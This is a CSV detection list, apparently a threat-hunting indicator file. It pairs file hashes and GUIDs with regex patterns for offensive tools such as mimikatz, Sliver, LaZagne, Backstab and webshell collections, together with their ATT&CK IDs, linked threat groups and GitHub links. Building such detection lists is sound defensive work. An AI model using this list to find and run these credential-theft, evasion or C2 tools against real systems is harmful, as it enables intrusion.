"*261a166e7f42a53510b2ee2faa1178302e3c83887dc138dc32415c77b22a1bd4*",".{0,1000}261a166e7f42a53510b2ee2faa1178302e3c83887dc138dc32415c77b22a1bd4.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","0","#filehash","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","23465"
"*261f880e-4bee-428d-9f64-c29292002c19*",".{0,1000}261f880e\-4bee\-428d\-9f64\-c29292002c19.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#GUIDproject","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","23467"
"*2623810712c6c081acd999538b5d6a7d28e166bf5e515648d30e30f01ea38e1c*",".{0,1000}2623810712c6c081acd999538b5d6a7d28e166bf5e515648d30e30f01ea38e1c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23468"
"*2626b0227e8a7c5451bbc27b3988db5214b47f004c5856d4fdadd31731010d2e*",".{0,1000}2626b0227e8a7c5451bbc27b3988db5214b47f004c5856d4fdadd31731010d2e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23469"
"*2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b*",".{0,1000}2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","23470"
"*26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326*",".{0,1000}26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23472"
"*2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780*",".{0,1000}2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23473"
"*2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780*",".{0,1000}2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23474"
"*263a97ae0cf8daefca89d894014060176d030af5b2e94cea2846af2e4c64c644*",".{0,1000}263a97ae0cf8daefca89d894014060176d030af5b2e94cea2846af2e4c64c644.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","23475"
"*2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da*",".{0,1000}2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#filehash","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","23478"
"*2661F29C-69F5-4010-9198-A418C061DD7C*",".{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","23481"
"*26654c4213cbaff5769618c96be371610ea48ff3f85e909786b9218063e95214*",".{0,1000}26654c4213cbaff5769618c96be371610ea48ff3f85e909786b9218063e95214.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23483"
"*26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9*",".{0,1000}26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","23484"
"*266b50dd481bfa762dde5f54c014cdfa3b6bb6d3d1e05a7a0c49a4fb81eceb3c*",".{0,1000}266b50dd481bfa762dde5f54c014cdfa3b6bb6d3d1e05a7a0c49a4fb81eceb3c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23485"
"*266e26430006ea2f97fb62e9f9a070a64af7af9a4879a8f8ca3008c5434d3ce5*",".{0,1000}266e26430006ea2f97fb62e9f9a070a64af7af9a4879a8f8ca3008c5434d3ce5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23486"
"*266fa73ded3a2a2dc421e5605dc2fa2bff53d999fe3adebc44ffa989c33061bf*",".{0,1000}266fa73ded3a2a2dc421e5605dc2fa2bff53d999fe3adebc44ffa989c33061bf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23487"
"*2672d3407c4e05697db342691363db2953fe732c6d87dab56888c401acc7e964*",".{0,1000}2672d3407c4e05697db342691363db2953fe732c6d87dab56888c401acc7e964.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23488"
"*26733ba4a4306ff57e50790349fca2d49135e8c915fdc608a5600e80b69e1a01*",".{0,1000}26733ba4a4306ff57e50790349fca2d49135e8c915fdc608a5600e80b69e1a01.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23489"
"*2677e9423aa9c338fa85cc819fa88b20262f6838f7323da6513c80a0c9c05803*",".{0,1000}2677e9423aa9c338fa85cc819fa88b20262f6838f7323da6513c80a0c9c05803.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","23491"
"*2677ebb8de5a2911a2edf04e2740812d5e4f4d93ddf370685c4f4176963b675e*",".{0,1000}2677ebb8de5a2911a2edf04e2740812d5e4f4d93ddf370685c4f4176963b675e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23492"
"*267c2cc1712018393f79e00ee869f86e8be7522569e18ec76ab2c8deb36ba9d1*",".{0,1000}267c2cc1712018393f79e00ee869f86e8be7522569e18ec76ab2c8deb36ba9d1.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","23493"
"*268a67a9e978f95dc4ac09e9e0197ec58db072fd4a798c7c08faae35cfdcf4a6*",".{0,1000}268a67a9e978f95dc4ac09e9e0197ec58db072fd4a798c7c08faae35cfdcf4a6.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23497"
"*268bd4cf2215cfb4153bc7431f22bcf7d4a7790f305c21327566e6758fe3eb5a*",".{0,1000}268bd4cf2215cfb4153bc7431f22bcf7d4a7790f305c21327566e6758fe3eb5a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23498"
"*268cd1727a2d84acc991768b9d4d30adcef18dca75f357e56aa0bdc91f345fd7*",".{0,1000}268cd1727a2d84acc991768b9d4d30adcef18dca75f357e56aa0bdc91f345fd7.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","23499"
"*26953f6a9ae961392ed1484e9c7ace1211f5f962*",".{0,1000}26953f6a9ae961392ed1484e9c7ace1211f5f962.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23500"
"*269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72*",".{0,1000}269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23502"
"*269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e*",".{0,1000}269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","23503"
"*26a1cdb5b3fd8d0aae6e80c75f2fc44584e602c808e22ceaa006d84e16da9d5a*",".{0,1000}26a1cdb5b3fd8d0aae6e80c75f2fc44584e602c808e22ceaa006d84e16da9d5a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23504"
"*26a4bf1b21bc16bd38c859e0d6becb178106843a914f5657d649f9d68e594eb9*",".{0,1000}26a4bf1b21bc16bd38c859e0d6becb178106843a914f5657d649f9d68e594eb9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23505"
"*26a7ddb93dd3f6a9b53d864af66267cc0b675be9092863edfa43810eb2363ade*",".{0,1000}26a7ddb93dd3f6a9b53d864af66267cc0b675be9092863edfa43810eb2363ade.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23506"
"*26aa83adf9a90a1a5438f2b64a5dba4d0a776dc55c634f0e913c6a28f31b036b*",".{0,1000}26aa83adf9a90a1a5438f2b64a5dba4d0a776dc55c634f0e913c6a28f31b036b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23507"
"*26af8449b5506e9413d8459329fbdf2b44977f4b6e293eb26e6daef2409e51cc*",".{0,1000}26af8449b5506e9413d8459329fbdf2b44977f4b6e293eb26e6daef2409e51cc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","23509"
"*26af9c0734525448e4a8d56c9c7b05df0146497ec71101c33812f3f3503201eb*",".{0,1000}26af9c0734525448e4a8d56c9c7b05df0146497ec71101c33812f3f3503201eb.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23510"
"*26b7d1e0b6ed36874a1b73d5077af3778eb5537b842eff21e3b1be359154151a*",".{0,1000}26b7d1e0b6ed36874a1b73d5077af3778eb5537b842eff21e3b1be359154151a.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23511"
"*26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03*",".{0,1000}26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23515"
"*26d349e65525178dd3b6d69332c479362ce9be10e6c311b178e07bc82c904d16*",".{0,1000}26d349e65525178dd3b6d69332c479362ce9be10e6c311b178e07bc82c904d16.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23518"
"*26d5dadb8fec5f13b488f0532dbcf4d9cb4331ad1b7e7277ac9331fa39275528*",".{0,1000}26d5dadb8fec5f13b488f0532dbcf4d9cb4331ad1b7e7277ac9331fa39275528.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23522"
"*26dac5422f343bdc37148b510dd98d08046266ff06c15119c1193a9d9a3d5a5b*",".{0,1000}26dac5422f343bdc37148b510dd98d08046266ff06c15119c1193a9d9a3d5a5b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23523"
"*26db7b92f4cc5c522ef48c9d7b41b8d72dd9a02b692dff91ca6234ee9559a5a6*",".{0,1000}26db7b92f4cc5c522ef48c9d7b41b8d72dd9a02b692dff91ca6234ee9559a5a6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23524"
"*26de444c20c30bd7d731ff5322fca24dc5f442f43daaa5d840edfcc594e17465*",".{0,1000}26de444c20c30bd7d731ff5322fca24dc5f442f43daaa5d840edfcc594e17465.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23525"
"*26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86*",".{0,1000}26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","23526"
"*26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310*",".{0,1000}26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23528"
"*26e7da8d0f2d7f18d96a76bfe5bfd78035fb091f6ad0edb700566accfa5fb97c*",".{0,1000}26e7da8d0f2d7f18d96a76bfe5bfd78035fb091f6ad0edb700566accfa5fb97c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23529"
"*26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1*",".{0,1000}26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23530"
